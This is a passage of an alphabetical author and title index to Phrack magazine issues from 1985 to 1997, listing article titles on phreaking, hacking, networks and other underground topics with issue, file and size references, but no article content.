+   "The Total Network Data System" by Doom Prophet. 1987. I12 F5 13k
+
+"Phreaking in Germany" by Ninja Master 1991 I33 F8 7k
+"Phreaks in Verse" by Sir Francis Drake. 1987. I13 F5 3k
+"Phreaks in Verse II" by Homey The Hacker 1991. I36 F8 14k 
+Professor Falken authored
+        "Tymnet Diagnostic Tools" 1992. I42 F5 35k
+Phrozen Ghost authored 
+        "Hacking CDC's Cyber" 1988. I18 F5 12k
+"Physical Access and Theft of PBX Systems" by Co/Dec. 1993. I43 F15 28k
+
+PIRATING see WAREZ
+
+"Pirate's Cove" by Rambone. 1992. I37 F3 8k
+"Pirate's Cove" by Rambone. 1992. I38 F3 23k
+"Pirate's Cove" by Rambone. 1992. I40 F5 57k
+"Pirate's Cove" by Rambone. 1992. I41 F5 32k
+"Playing Hide and Seek, Unix Style" by Phrack Accident. 1993. I43 F14 31k
+"The Postal Inspection Service" by Vendetta. 1989. I27 F9 14k
+"Plant Measurement" by The Executioner. 1986. I9 F6 13k
+"Prevention of The Billing Office Blues" by Forest Ranger. 1985. I2 F2 1k
+"Preview to Phrack 13-The Life & Times of The Executioner" 1987. I12 F3 5k
+Prime Suspect authored 
+        "A Few Things About Networks" 1988. I18 F9 21k
+
+PRIMOS OPERATING SYSTEM
+   "A Hacker's Guide to Primos: Part 1" by Cosmos Kid. 1987. I16 F3 11k
+   "Hacking Primos I, II, III" by Evil Jay. 1987. I11 F7 7k
+   "Hacking Primos Part I" by Evil Jay. 1987. I10 F6 11k
+   "Primos: Primenet, RJE, DPTX" by Magic Hasan. 1988. I18 F4 15k
+
+"Primos: Primenet, RJE, DPTX" by Magic Hasan. 1988. I18 F4 15k
+"Private Audience" by Overlord. 1986. I3 F5 13k
+Professor Erhart Moeller authored
+        "The Moeller Papers" 1993. I44 F10 30k       
+Professor authored
+        "Hardwire Interfacing under Linux" 1997. I50 F11 11k
+"Profile of MAX Long Distance Service" by Phantom Phreaker. 1986. I4 F4 4k
+"Programming RSTS/E File2: Editors" by Solid State. 1986. I9 F4 13k
+"Project Hades: TCP Weakness" by daemon9. 1996. I49 F7 38k
+"Project Loki: ICMP Tunneling" by daemon9/alhambra. 1996. I49 F7 38k
+"Project Neptune" by daemon9. 1996. I48 F13 52k
+The Pyro authored
+        "Blowguns" 1985. I2 F4 3K 3K
+PsychoSpy authored
+        "The Groom Lake Desert Rat" 1994. I46 F21 44k
+        
+
+                                   ** Q **
+
+
+"Quentin Strikes Again" by The Omega and White Knight. 1994. I45 F12 28k
+
+
+                                   ** R **
+
+
+The Racketeer authored
+        "Guide to Encryption" 1992. I42 F11 32k
+        "Network Miscellany" 1992. I40 F4 32k
+        "Network Miscellany" 1992. I41 F4 35k
+Radical Rocker authored 
+        "How to Make TNT" 1986. I7 F6 2k
+"Radio Free Berkley Information" 1994. I45 F24 35k
+"Radio Hacking" by The Seker. 1986. I5 F8 3k
+"R.A.G. - Rodents are Gay" by Evil Jay. 1987. I13 F6 6k
+"RAGS - The Best of Sexy Exy" 1987. I13 F9 19k
+Rambone authored
+        "Pirate's Cove" 1992. I37 F3 8k
+        "Pirate's Cove" 1992. I38 F3 23k
+        "Pirate's Cove" 1992. I40 F5 57k
+        "Pirate's Cove" 1992. I41 F5 32k
+Raoul wrote
+        "DCL BBS Program" 1994. I45 F16 23k
+Razor's Edge authored
+        "The Truth About Lie Detectors" 1989. I30 F9 15k
+"Reading Trans-Union Credit Reports" by The Disc Jockey. 1987. I16 F7 6k
+"Real Cyberpunks" by The Men From Mongo. 1991 I36 F9 13k
+"A Real Functioning PEARL BOX Schematic" by Dispater. 1989. I28 F5 5k
+"A Real Functioning RED BOX Schematic" by J.R. "Bob" Dobbs 1991. I33 F9 12k
+"Real Phreaker's Guide Vol. 2" by Taran King and Knight Lightning. 1987.
+ I13 F2 5k
+"The Reality of The Myth [REMOBS]" by Taran King. 1987. I14 F4 6k
+ReDragon was Pro-Philed in 1996. I48 F5 23k
+Red Knight authored
+        "An In-Depth Guide in Hacking Unix" 1988. I22 F5 35k
+Red Skull authored
+        "Startalk" 1994. I46 F18 21k
+R.E.M wrote
+        "Paid Advertisement"(unencoded game) 1994. I46 F6 62k
+        "Paid Advertisement Part ][" (unencoded game) 1994. I46 F7 45k
+"A Report on The Internet Worm" by Bob Page. 1988. I22 F8 16k
+Richard Goodwin authored
+        "Hollywood-Style Bits & Bytes" 1994. I45 F17 50k
+Richard C. Hollinger authored
+        "Computer Hackers Follow a Guttman-Like Progression. 1988. I22 F7 10k
+"Ring Back Codes for The 314 NPA" by Data Line. 1985. I4 F2 1k
+Robert Alien authored
+        "The AT&T Gateway" 1991 I34 F4 5k
+Robert Clark authored
+        "My Bust Part I" 1993. I43 F12 56k
+        "My Bust Part II" 1993. I43 F13 55k
+"Rolm Systems" by Monty Python. 1986. I3 F2 11k
+route authored
+        "Juggernaut"(linux tool) 1997. I50 F6 123k
+"The Royal Court [from Metal Shop Private BBS]" 1988. I20 F10 3k
+"RSTS" by Crimson Death. 1990. I32 F9 23k
+
+RSTS OPERATING SYSTEM
+   "Hacking RSTS" by Data Line. 1985. I2 F8 4k
+   "Hacking RSTS Part 1" by The Seker. 1986. I7 F5 12k
+   "Programming RSTS/E File2: Editors" by Solid State. 1986. I9 F4 13k
+   "RSTS" by Crimson Death. 1990. I32 F9 23k
+
+"Running a BBS on X.25" by Seven Up. 1994. I45 F8 15k
+Ryche authored
+        "Hacking Chilton's Credimatic" 1986. I7 F4 8k
+
+
+                                   ** S **
+
+
+The $muggler authored
+        "Coin Box Thief Wanted" (PWN) 1987. I16 F12 2k
+        "'Illegal' Hacker Crackdown" (PWN) 1988. I17 F11 5k
+        "Snarfing Remote Files" by Dark Overlord. 1989. I28 F6 5k
+        "Social Engineering [from Metal Shop Private BBS]" 1988. I20 F8 19k
+"Safe and Easy Carding" by VaxBuster 1993. I44 F20 18k
+"SAM Security" by Spitfire Hacker. 1985. I1 F2 2k
+"Sara Gordon -vs- Kohntark Part I" by The Editor. 1993. I44 F11 12k
+"Sara Gordon -vs- Kohntark Part II" by The Editor. 1993. I44 F12 47k
+"Satellite Communications" by Scott Holiday. 1988. I21 F5 9k
+Scan Man authored 
+        "Scan Man's Rebuttal to Phrack World News" 1987. I12 F9 17k
+"Scan Man's Rebuttal to Phrack World News" by Scan Man. 1987. I12 F9 17k
+"School/College Computer Dial-Ups" by Phantom Phreaker. 1985. I1 F8 4k
+Scott Holiday authored 
+        "Satellite Communications" 1988. I21 F5 9k
+Scott Simpson authored
+        "Hacking AT&T System 75" 1992. I41 F6 20k
+"Screwing Over Your Local McDonalds" by Charlie X. 1994. I45 F19. 20k
+"Searching for speciAL acceSs agentS" by Dr. Dude. 1991. I36 F7 18k
+"Searching The Dialog Information Service" by Al Capone. 1993. I44 F18 48k
+"Security Guidelines" by Various Sources. 1994. I45 F10 55k
+"Security Shortcomings of AppleShare Networks" by Bobby Zero. 1992. I41 F9 16k
+The Seker authored
+        "Radio Hacking" 1986. I5 F8 3k
+        "Hacking RSTS Part 1" 1986. I7 F5 12k
+        "Sending Fakemail in Unix" by Dark Overlord. 1989. I27 F8 2k
+"The Senator Markey Hearing Transcripts" by >Unknown User<. I45 F20 72k
+Sendai authored
+        "Keytrap Revisisted" 1996. I48 F12 13k
+Seven Up authored
+        "Running a BBS on X.25" 1994. I45 F8 15k
+        "The ABCs of Better Hotel Staying" 1994. I46 F25 12k
+"Shadows of a Future Past (Part 1 of The Vicious Circle Trilogy)" by
+ Knight Lightning. 1988. I21 F3 26k
+Shadow Hawk 1 was Pro-Philed in 1992. I39 F3 8k
+The Shining authored
+        "Unix Hacking - Tools of The Trade" 1994. F11 42k
+Shooting Shark authored
+        Introduction/Index for I15,17 F1 2k
+        "More Stupid Unix Tricks" 1987. I15 F2 10k
+        "Nasty Unix Tricks" 1986. I6 F5 4k
+        "Shadow Hawk Busted Again" 1987. I16 F11 2k
+        "Social Security Number Formatting" 1988. I19 F4 3k
+        "Trojan Horses in Unix" 1986. I7 F7 13k
+Shooting Shark Pro-Philed in 1991 I33 F2 6k
+Sideshow Bob authored
+        "PC Application Level Security" 1997. I50 F12 21k
+Signal Substain authored
+        "Nitrogen-Trioxide Explosive" 1988. I17 F4 7k
+"Signalling Systems Around The World" by Data Line. 1986. I3 F4 2k
+"Simple Data Encryption or Digital Electronics 101" by The Leftist. 1987.
+ I11 F5 4k
+Sir Francis Drake authored
+        "Phrack World News" 1987. I15 F8 6k
+        "Bust Update" (PWN) 1988. I17 F11 3k
+        "Phreaks in Verse" 1987. I13 F5 3k
+Sir Hackalot authored 
+        "Unix 'Nasties'" 1990. I32 F5 32k
+Skylar authored
+        "Sprintnet Directory Part 1/3" 1992. I42 F8 49k
+        "Sprintnet Directory Part 2/3" 1992. I42 F9 45k
+        "Sprintnet Directory Part 3/3" 1992. I42 F10 46k
+"Skytel Paging and Voicemail" by pbxPhreak. 1997. I50 F10 36k
+S. Leonardo Spitz authored
+        "Phrack Pro-Phile on Chris Goggens" 1991. I35 F3 20k
+"Smashing The Stack For Fun And Profit" by Aleph1. 1996. I49 F14 66k
+"Smoke Bombs" by Alpine Cracker. 1986. I6 F6 2k
+"SNMP insecurities" by alhambra. 1997. I50 F7 20k
+"SS7 Diverter plans" by Mastermind. 1997. I50 F9 27k
+Steve Fleming authored
+        "The Truth...and Nothing but the Truth" 1996. I48 F16 19k
+"Social Security Numbers & Privacy" by Chris Hibbert of CPSR. 1991. I35 F6 13k
+Solid State authored 
+        "Programming RSTS/E File2: Editors" 1986. I9 F4 13k
+The Sorceress authored
+        "Accessing Government Computers" 1988. I17 F7 9k
+        "Cracker are Cheating Bell" (PWN) 1988. I17 F12 8k
+        "SPAN: Space Physics Analysis Network" by Knight Lightning. 1989.
+         I25 F4 47k
+"Social Security Number Formatting" by Shooting Shark. 1988. I19 F4 3k
+"South Western Bell Lineman Word Codes" by Icon. 1997. I49 F11 18k
+Sovereign Immunity authored
+        "Sting Operations" 1991. I35 F5 6k
+"Special Area Codes" by >Unknown User<. 1989. I24 F8 27k
+Spirit Walker co-authored
+        "Phrack World News" Part 1-4 1992 I37 F11-14 31,30,29,31k
+Spitfire Hacker authored 
+        "SAM Security" 1985. I1 F2 2k
+Split Decision authored 
+        "Phone Bugging: Telecom's Underground Industry" 1989. I26 F7 7k
+"Sprintnet Directory Part 1/3" by Skylar. 1992. I42 F8 49k
+"Sprintnet Directory Part 2/3" by Skylar. 1992. I42 F9 45k
+"Sprintnet Directory Part 3/3" by Skylar. 1992. I42 F10 46k
+Spy Ace authored
+        "Step by Step Guide to Stealing a Camaro" 1993. I43 F20 21k
+"Standing up to Fight The Bells" by Knight Lightning. 1992. I38 F10 27k
+"Startalk" by The Red Skull. 1994. I46 F18 21k
+Static authored
+        "Information About NT's FMT-150/B/C/D" 1996. I48 F9 22k
+"Steganography Improvement Proposal" by cjml. 1996. I49 F10 6k
+Stephane Bausson authored
+        "Electronic Telephone Cards(Part 1)" 1996. I48 F10 39k
+        "Electronic Telephone Cards(Part 2)" 1996. I48 F11 66k        
+"Step by Step Guide to Stealing a Camaro" by Spy Ace. 1993. I43 F20 21k
+"Sting Operations" by Sovereign Immunity. 1991. I35 F5 6k
+"Subdivisions (Part 3 of The Vicious Circle Trilogy)" by Knight Lightning.
+ 1989. I23 F3 17k                                                
+Substance authored
+        "The Complete Guide to Hacking Meridian Voice Mail" 1995. I47 F15 10k
+"SummerCon 1992" by Knight Lightning and Dispater. 1992. I40 F11 35k
+Suppernigger was Pro-Philed in 1992. I41 F3 10k
+Synapse authored
+        "Datapac" 1993. I44 F21 36k
+SynThecide authored
+        "Covert Paths" (co-authored) 1989. I29 F5 4k
+        "Hacking and Tymnet" 1989. I30 F3 20k
+Szechuan Death authored
+        "Legal Info" 1994. I46 F9 13k
+
+
+                                   ** T **
+
+
+"10th Chaos Computer Congress" by Manny E. Farber. 1994. I45 F13 23k
+"TAC Info" no author. 1985. I2 F5 14K
+"TAMS & Telenet Security" by Phreak_Accident. 1990. I31 F4 7k
+"Tandy/Radio Shack Cellular Phones" by Damien Thorn. 1996. I48 F7 43k
+"Tapping Telephone Lines" by Agent Steal. 1987. I16 F6 9k
+Taran King authored
+        "AIS - Automatic Intercept System" 1987. I11 F6 16k
+        "Bell Network Switching Systems" 1989. I25 F3 16k
+        "Breaching and Clearing Obstacles" 1986. I4 F5 7k
+        "Computer-Based Systems for Bell System Operation" 1989. I26 F2 38k
+        Introduction/Indexes for I1-2,5-13 F1
+        Introduction/Indexes (co-authored) for I20-30 F1
+        "Introduction of Phrack" 1985. I1 F1 2k
+        "Network Miscellany" 1989. I28 F4 30k
+        "Network Miscellany II" 1989. I29 F4 35k
+        "Network Miscellany III" 1989. I30 F2 21k
+        "Operating The VM/SP CP" 1989. I27 F2 38k
+        "Phrack Pro-Phile of Broadway Hacker" 1986. I5 F2 5k
+        "Phrack Pro-Phile of Scan Man" 1986. I7 F2 7k
+        "Phrack Pro-Phile Featuring Chanda Leir" 1989. I24 F2 6k
+        "Phrack Pro-Phile Featuring The Mentor" 1989. I23 F2 7k
+        "Phrack Pro-Phile Featuring Terminus" 1987. I14 F2 7k
+        "Phrack Pro-Phile on Agrajag The Prolonged" 1987. I12 F2 7k
+        "Phrack Pro-Phile on Crimson Death" 1986. I4 F1
+        "Phrack Pro-Phile on Dave Starr" 1987. I10 F2 8k
+        "Phrack Pro-Phile on Emanuell Goldstein" 1989. I29 F2 16k
+        "Phrack Pro-Phile on Erik Bloodaxe" 1989. I28 F2 15k
+        "Phrack Pro-Phile on Karl Marx" (co-authored) 1988. I22 F2 9k
+        "Phrack Pro-Phile on Lex Luthor" 1992. I40 F3 36k
+        "Phrack Pro-Phile on Modem Master" 1988. I21 F2 6k
+        "Phrack Pro-Phile on The Nightstalker" 1986. I9 F2 6k
+        "Phrack Pro-Phile on Taran King" 1988. I20 F2 14k
+        "Phrack Pro-Phile on Tuc" 1986. I8 F2 6k
+        "Phrack Pro-Phile on Wizard of Arpanet" 1987. I11 F2 7k
+        "Phrack World News" (co-authored) 1988. I22 F9 25k-12
+        "The Reality of The Myth [REMOBS]" by Taran King. 1987. I14 F4 6k
+        "Universal Informational Services via ISDN" 1985. I2 F6 6K
+   co-authored
+        "Network Management Center" (co-authored) 1988. I21 F6 13k
+        "SummerCon 1992"(co-authored) 1992. I40 F11 35k
+        "Real Phreaker's Guide Vol. 2" (co-authored) 1987. I13 F2 5k
+        "25th Anniversary Index" (co-authored). 1989. I25 F2 15k
+        "Welcome to Metal Shop Private" (co-authored) 1988. I20 F4 37k
+"TCP/IP: A Tutorial Part 1 of 2" by The Not. 1991 I33 F8 28k
+"TCP/IP: A Tutorial Part 2 of 2" by The Not. 1991 I34 F8 39k
+"TCP port Stealth Scanning" by Uriel I49 F15 32k
+"Telephone Company Customer Applications" by Voyager. 1996. I49 F13 38k
+"The Technical Revolution" by Dr. Crash. 1986. I6 F3 4k
+"The Tele-Pages" by Jester Sluggo. 1988. I21 F4 37k
+
+TELENET  see X.25 PACKET SWITCHING NETWORKS
+
+"Telenet/Sprintnets PC Pursuit Outdial Directory" by Amadeus. 1991. I35 F4 90k
+"Telephone Company Customer Applications" by Voyager. 1996. I49 F13 38k
+"Telephone Signalling Methods" by Doom Prophet. 1987. I11 F8 7k
+
+TELEPHONE SWITCHING EQUIPMENT AND METHODS
+   "Bell Network Switching Systems" by Taran King. 1989. I25 F3 16k
+   "Digital Multiplexing Systems (Part 2)" by Control C. 1988. I19 F3 18k
+   "DMS-100" by Knight Lightning. 1986. I5 F5 8k
+   "Facility Assignment & Control Systems" by Phantom Phreaker. 1988.
+      I19 F5 11k
+   "NorThern Telecom's FMT-150B/C/D" by FyberLyte. 1993. I44 F13 16k
+   "Searching The Dialog Information Service" by Al Capone. 1993. I44 F18 48k
+   "Signalling Systems Around The World" by Data Line. 1986. I3 F4 2k
+   "Telephone Signalling Methods" by Doom Prophet. 1987. I11 F8 7k
+   "The Universal Data Convertor" by Maldoror. 1994. I45 F21 45k
+   "Understanding The Digital Multiplexing System (DMS)" by Control C. 1987.
+      I12 F4 19k
+   "Understanding DMS Part II" by Control C. 1987. I14 F5 18k
+
+
+The Man authored
+        "Your New Windows Background (Part 1)"<unencoded> 1995. I47 F17 39k
+        "Your New Windows Background (Part 2)"<unencoded> 1995. I47 F18 46k
+"The Truth...and Nothing but the Truth" by Steve Fleming. 1996. I48 F16 19k
+Thomas Covenant authored
+        "How to Fuck Up The World - A Parody" 1987. I13 F3 10k
+   co-authored
+        "How to Build a Paisley Box" 1987. I13 F4 5k
+Thumpr authored 
+        "Big BroTher Online" 1989. I23 F10 8k
+"Timeline Featuring Taran King, Knight Lightning, and Cheap Shades" 1988.
+ I20 F2
+"The TMC Primer" by Cap'n Crax. 1987. I10 F3 6k
+Tom Brokow authored
+        "Credit Card Laws" 1987. I16 F5 7k
+Toucan Jones authored
+        "BT Tymnet, Part 1/3" 1992. I40 F8 57k
+        "BT Tymnet, Part 2/3" 1992. I40 F9 55k
+        "BT Tymnet, Part 3/3" 1992. I40 F10 91k
+"The Total Network Data System" by Doom Prophet. 1987. I12 F5 13k
+Treason authored
+        "An Overview of Pre-Paid Calling Cards" 1995. I47 29k        
+"The Tried and True Home Production Method for Methamphetamine"
+ by The Leftist. 1986. I4 F8 7k
+The Trunk Terminator authored
+        "International Toll Free Code List" 1991 I33 F6 15k
+"A Trip to The NCSC" by Knight Lightning. 1990. I32 F7 16k
+"Trojan Horses in Unix" by Shooting Shark. 1986. I7 F7 13k
+"The Truth About Lie Detectors" by Razor's Edge. 1989. I30 F9 15k
+"TRW Business Terminology" by Control C. 1987. I14 F6 5k
+TTY-Man co-authored 
+        "Multi-User Chat Program for DEC-10's" 1986. I9 F7 7k
+"TTY Spoofing by VaxBuster" 1992. I41 F8 20k
+"25th Anniversary Index" by Knight Lightning, Taran King, and oTher friends.
+   1989. I25 F2 15k
+Twister Pair authored
+        "Auto-Answer It" 1991. I35 F9 10k
+TYMNET see X.25 PACKET SWITCHING NETWORKS
+"Tymnet Diagnostic Tools" by Professor Falken. 1992. I42 F5 35k
+"Tymnet Security Memo" by Anonymous. 1990. I31 F7 9k
+
+
+                                   ** U **
+
+
+"Understanding The Digital Multiplexing System (DMS)" by Control C. 1987.
+   I12 F4 19k
+"Understanding DMS Part II" by Control C. 1987. I14 F5 18k
+"Universal Informational Services via ISDN" by Taran King. 1985. I2 F6 6K
+"Unix Cracking Tips" by Dark Overlord. 1989. I25 F5 14k
+"Unix for The Moderate" by Urvile. 1988. I18 F6 11k
+"Unix 'Nasties'" by Sir Hackalot. 1990. I32 F5 32k
+
+UNIX OPERATING SYSTEM
+   "Hardwire Interfacing under Linux" by Professor. 1997. I50 F11 11k
+   "Hiding Out Under Unix" by Black Tie Affair. 1989. I25 F6 9k
+   "Introduction to CGI and CGI vulnerabilities" by G. Gilliss. 1996.
+     I49 F8 12k
+   "An In-Depth Guide in Hacking Unix" by Red Knight. 1988. I22 F5 35k
+   "Juggernaut"(linux tool) by route. 1997. I50 F6 123k
+   "Linux TTY hijacking" by halflife. 1997. I50 F5 15k
+   "More Stupid Unix Tricks" by Shooting Shark. 1987. I15 F2 10k
+   "Nasty Unix Tricks" by Shooting Shark. 1986. I6 F5 4k
+   "Playing Hide and Seek, Unix Style" by Phrack Accident. 1993. I43 F14 31k
+   "Sending Fakemail in Unix" by Dark Overlord. 1989. I27 F8 2k
+   "Snarfing Remote Files" by Dark Overlord. 1989. I28 F6 5k
+   "Trojan Horses in Unix" by Shooting Shark. 1986. I7 F7 13k
+   "Unix Cracking Tips" by Dark Overlord. 1989. I25 F5 14k
+   "Unix for The Moderate" by Urvile. 1988. I18 F6 11k
+   "Unix Hacking - Tools of The Trade" by The Shining. 1994. F11 42k
+   "Unix 'Nasties'" by Sir Hackalot. 1990. I32 F5 32k
+   "Unix System Security Issues" by Jester Sluggo. 1988. I18 F7 27k
+   "Yet AnoTher File on Hacking Unix" by >Unknown User<. 1988. I22 F6 19k
+
+"Unix Hacking - Tools of The Trade" by The Shining. 1994. F11 42k
+"Unix System Security Issues" by Jester Sluggo. 1988. I18 F7 27k
+>Unknown User< (Phrack's anonymous submitter alias) was used to tag
+   "Centigram Voice Mail System Consoles"  1992. I39 F6 36k
+   "The Senator Markey Hearing Transcripts" I45 F20 72k
+   "Special Area Codes" 1989. I24 F8 27k
+   "Tymnet Security Memo" 1990. I31 F7 9k
+   "Yet AnoTher File on Hacking Unix" 1988. I22 F6 19k
+"The Universal Data Convertor" by Maldoror. 1994. I45 F21 45k
+Uriel authored
+        "TCP port Stealth Scanning" I49 F15 32k        
+Urvile authored
+        "Unix for The Moderate" 1988. I18 F6 11k
+
+USENET see WIDE AREA NETWORKS
+
+"Useful Commands for The TP3010 Debug Port" by G. Tenet. 1992. I42 f7 28k
+"Users Guide to VAX/VMS Part 1/3" by Black Kat. 1991. I35 F7  62k
+"Users Guide to VAX/VMS Part 2/3" by BLack Kat. 1992. I37 F7 25k
+"Users Guide to VAX/VMS Part 3/3" by Black Kat. 1992. I38 F7 46k
+"Users Guide to XRAY" by NOD. 1992. I42 F6 11k
+"Utopia; Chapter One of FTSaga" by Knight Lightning. 1989. I23 F4 20k
+
+UUCP see WIDE AREA NETWORKS
+
+
+                                   ** V **
+
+
+Various Sources contributed to
+        "Cellular Debug Mode Commands" 1994. I45 F26 13k
+        "Conference News Part I" 1993. I43 F7 53k
+        "Conference News part II" 1993. I43 F8 58k
+        "Conference News Part I" 1993. I44 F6 55k
+        "Conference News Part II" 1993. I44 F7 35k
+        "Conference News Part III" 1993. I44 F8 50k
+        "Defcon Information" 1995. I47 F9 28k
+        "Defcon II Information" 1994. I45 F14 26k
+        "HoHoCon"(review) 1992. I42 F13 51k
+        "HoHoCon Miscellany" 1994. I45 F11 32k
+        "HoHoCon Miscellany" 1995. I47 F12 33k
+        "International Scene" 1993. I43 F26 51k
+        "International Scene" 1993. I44 F26 25k
+        "International Scene" 1994. I45 F27 63k 
+        "International Scene" 1994. I46 F27 44k
+        "International Scene" 1995. I47 F21 39k
+        "International Scene" 1996. I48 F17 33k
+        "Line Noise" 1997. I50 F3 72k
+        "Security Guidelines" 1994. I45 F10 55k
+        "VMS Information" 1994. I45 F15 34k
+VaxCat authored
+        "Lifting Ma Bell's Cloak of Secrecy" 1989. I24 F9 25k
+VaxCat co-authored 
+        "Can You Find Out If Your Telephone is Tapped?" 1989. I23 F9 20k
+"VAX/VMS Fake Mail" by Jack T. Tabb. 1989. I30 F7 7k
+
+VAX/VMS OPERATING SYSTEM
+   "DCL BBS Program" by Raoul. 1994. I45 F16 23k
+   "DCL Utilities for VMS Hackers" by The Mentor. 1988. I19 F2 23k
+   "Getting Serious About VMS Hacking" by VAXBusters International. 1989.
+      I23 F8
+   "Inside The SYSUAF.DAT File" by Pain Hertz. 1990. I32 F8 16k
+   "Users Guide to VAX/VMS Part 1/3" by Black Kat. 1991. I35 F7  62k
+   "Users Guide to VAX/VMS Part 2/3" by Black Kat. 1992. I37 F7 25k
+   "Users Guide to VAX/VMS Part 3/3" by Black Kat. 1992. I38 F7 46k
+   "VAX/VMS Fake Mail" by Jack T. Tabb. 1989. I30 F7 7k
+   "VMS Information" by Various Sources. 1994. I45 F15 34k
+VaxBuster authored
+        "TTY Spoofing" 1992. I41 F8 20k
+        "Safe and Easy Carding" 1993. I44 F20 18k
+VAXBusters International authored
+        "Advanced BITNET Procedures" 1989. I24 F7 k
+        "Getting Serious About VMS Hacking" 1989. I23 F8 13k
+
+Vendetta authored 
+        "The Postal Inspection Service" 1989. I27 F9 14k
+
+Vince Niel authored
+        "The Freedom of Information Act and You" 1992. I42 F12 42k
+"VisaNet Operations Part I" by Ice Jey. 1994. I46 F15 50k
+"VisaNet Operations Part 2" by Ice Jey. 1994. I46 F16 44k
+Visionary authored
+        "Visionary-The Story About Him" 1993. I44 F17 23k
+"Visionary-The Story About Him" by Visionary. 1993. I44 F17 23k
+
+VM/CMS OPERATING SYSTEM
+   "A Beginner's Guide to The IBM VM/370" by Elric of Imryrr. I10 F4 4k
+   "Hacking VM/CMS" by Goe. 1989. I30 F4 58k
+   "Operating The IBM VM/SP CP" by Taran King. 1989. I27 F2 38k
+   "VMS Information" by Various Sources. 1994. I45 F15 34k
+
+VOICE MAIL SYSTEMS
+   "Centigram Voice Mail System Consoles" by >Unknown User<. 1992. I39 F6 36k
+   "The Complete Guide to Hacking Meridian Voice Mail" by Substance. 1995.
+    I47 F15 10k
+   "Fun With The Centagram VMS Network" by Oryan Quest. 1986. I9 F3 4k
+   "Rolm Systems" by Monty Python. 1986. I3 F2 11k
+   "Skytel Paging and Voicemail" by pbxPhreak. 1997. I50 F10 36k
+   "Startalk" by The Red Skull. 1994. I46 F18 21k
+   "Hacking Voice Mail Systems" by Black Knight from 713. 1987. I11 F4 6k
+   "Hacking Voice Mail Systems" by Night Ranger. 1991. I34 F6 19k                                   
+
+Voyager authored
+        "The #hack FAQ (Part 1)" 1995. I47 F5 39k
+        "The #hack FAQ (Part 2)" 1995. I47 F6 38k
+        "The #hack FAQ (Part 3)" 1995. I47 F7 51k
+        "The #hack FAQ (Part 4)" 1995. I47 F8 47k
+        "Telephone Company Customer Applications" 1996. I49 F13 38k
+Voyager was Pro-Philed in 1996. I48 F5 23k
+
+
+                                   ** W **
+
+WAREZ
+  "A Day in The Life of a Warez Broker" by Xxxx Xxxxxxxx. 1995. I47 F20 13k
+  "*ELITE* Access" by Dead Lord & Lord Digital(Lords Anonymous). 1991.
+   I36 F5 43k
+  "Pirate's Cove" by Rambone. 1992. I37 F3 8k
+  "Pirate's Cove" by Rambone. 1992. I38 F3 23k
+  "Pirate's Cove" by Rambone. 1992. I40 F5 57k
+  "Pirate's Cove" by Rambone. 1992. I41 F5 32k
+WEAPONS
+   "Blowguns" by The Pyro. 1985. I2 F4 3K 3K
+   "Building a Shock Rod" by Circle Lord. 1986. I3 F8 3k
+   "Homemade Guns" by Man-Tooth. 1985. I2 F3 7k
+
+"Welcome to Metal Shop Private" by Taran King, Knight Lightning, and
+ Cheap Shades. 1988. I20 F4 37k
+"Western Union Telex, TWX, and Time Service" by Phone Phanatic. 1989.
+ I30 F10 13k
+White Knight co-authored
+        "Quentin Strikes Again" 1994. I45 F12 28k
+
+WIDE AREA NETWORKS (Internet, BITNET, ArpaNET, Usenet, UUCP, TCP/IP, etc.)
+   "Advanced BITNET Procedures" by VAXBusters International. 1989. I24 F7 k
+   "Content-Blind Cancelbot" by Dr. Dimitri Vulis. I49 F9 40k     
+   "Covert Paths" by Cyber Neuron Limited and SynThecide. 1989. I29 F5 4k
+   "The DECWRL Mail Gateway" by Dedicated Link. 1989. I30 F5 23k
+   "A Few Things About Networks" by Prime Suspect. 1988. I18 F9 21k
+   "Foundations on The Horizon; Chapter Two of FTSaga" by Knight Lightning.
+      1989. I23 F5 27k
+   "Frontiers; Chapter Four of FTSaga" by Knight Lightning. 1989. I24 F4 25k
+   "Future Trancendent Saga Index A" from The BITNET Services Library. 1989.
+      I23 F6 14k
+   "Future Trancendent Saga Index B" from The BITNET Services Library. 1989.
+      I23 F7 17k
+   "Internet Domains: FTSaga Appendix 3 (Limbo to Infinity)" by Phrack Inc.
+      1989. I26 F8 20k
+   "Introduction to The Internet Protocols I: Chapter Eight of The FTS" by
+      Knight Lightning.  1989. I28 F3 39k
+   "Introduction to The Internet Protocols II: Chapter Nine of The FTS" by
+      Knight Lightning. 1989. I29 F3 43k
+   "Introduction to The MIDNET: Chapter Seven of The FTS" by Knight Lightning.
+      1989. I27 F3 35k
+   "IP-Spoofing Demystified" by daemon9. 1996. I48 F13 25k
+   "Limbo to Infinity; Chapter Three of FTSaga" by Knight Lightning. 1989.
+      I24 F3
+   "Network Management Center" by Knight Lightning and Taran King. 1988.
+      I21 F6
+   "Network Miscellany" by Racketeer. 1992. I40 F4 32k
+   "Network Miscellany" by Racketeer. 1992. I41 F4 35k
+   "Network Miscellany" by Taran King. 1989. I28 F4 30k
+   "Network Miscellany II" by Taran King. 1989. I29 F4 35k
+   "Network Miscellany III" by Taran King. 1989. I30 F2 21k
+   "Network Miscellany IV" by Datastream Cowboy 1992. I38 F5 30k
+   "Network Miscellany V" by Datastream Cowboy. 1992. I39 F4 34k
+   "Network Progression" by Dedicated Link. 1989. I24 F10 5k
+   "NSFnet: National Science Foundation Network" by Knight Lightning. 1989.
+      I26 F4
+   "Project Hades: TCP Weakness" by daemon9. 1996. I49 F7 38k
+   "Project Loki: ICMP Tunneling" by daemon9/alhambra. 1996. I49 F7 38k
+   "Project Neptune" by daemon9. 1996. I48 F13 52k
+   "A Report on The Internet Worm" by Bob Page. 1988. I22 F8 16k
+   "Snarfing Remote Files" by Dark Overlord. 1989. I28 F6 5k
+   "SNMP insecurities" by alhambra. 1997. I50 F7 20k
+   "SPAN: Space Physics Analysis Network" by Knight Lightning. 1989.
+    I25 F4 47k   
+   "TAC info" Unknown Author. 1985. I2 F5 14K
+   "TCP/IP: A Tutorial Part 1 of 1" by The Not. 1991 I33 F8 28k
+   "TCP/IP: A Tutorial Part 2 of 2" by The Not. 1991 I34 F8 39k
+   "TCP port Stealth Scanning" by Uriel I49 F15 32k
+   "Utopia; Chapter One of FTSaga" by Knight Lightning. 1989. I23 F4 20k
+   "Wide Area Information Services" by Mycroft 1992. I38 F8 11k
+   "Wide Area Networks Part 1" by Jester Sluggo. 1986. I5 F7 10k
+   "Wide Area Networks Part 2" by Jester Sluggo. 1986. I6 F8 10k
+
+"Wide Area Information Services" by Mycroft 1992. I38 F8 11k
+Wing Ding authored
+        "The History ah MOD" 1991. I36 F4 23k
+Winn Schwartau authored
+        "Cyber Christ Meets Lady Luck Part I" 1994. I46 F19 45k
